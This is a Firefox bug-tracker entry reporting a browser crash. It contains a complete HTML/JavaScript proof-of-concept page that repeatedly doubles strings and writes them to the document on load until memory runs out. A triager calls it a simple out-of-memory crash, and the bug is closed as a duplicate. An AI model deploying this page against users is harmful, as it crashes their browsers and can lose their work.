Closed Bug 752227 Opened 12 years ago Closed 12 years ago

Mozilla Firefox <=12.0 Denial Of Service Exploit

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Platform:
x86_64
Windows 7
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 736868

People

(Reporter: ni-_-_-_-_maarek, Unassigned)

Details

Attachments

(1 file)

Mozilla Firefox Denial Of Service Exploit.txt
929 bytes, text/plain
Details 
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19

Steps to reproduce:

save this file to html and run with ff
<html>
<title>FF go away :)</title>
<head>
<script>
function FTB()
 {
    var A1 = unescape("%u4141%u4141");
    var A2 = unescape("%u4242%u4242");
    var A3 = unescape("%u4343%u4343");
    var A4 = unescape("%u4444%u4444");
    for(i=0; i <= 1000 ; ++i)
 {
        A1+=A1;
        A2+=A2;
        A3+=A3;
        A4+=A4;
        document.write(A1);
        document.write(A2);
        document.write(A3);
        document.write(A4);
    }
    document.write(A1);
    document.write(A2);
    document.write(A3);
    document.write(A4);
}
</script>
</head>
<body onLoad="FTB()">
</body>
</html>


Actual results:

crash ff
This looks like a typical memory-exhaustion script. Create a string; then double its length, add it to the document, and repeat.... sure, you'll exhaust available memory before long. Is there any reason to suspect there's something other than a simple out-of-memory crash here?
it's not even original - see bug 736868
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: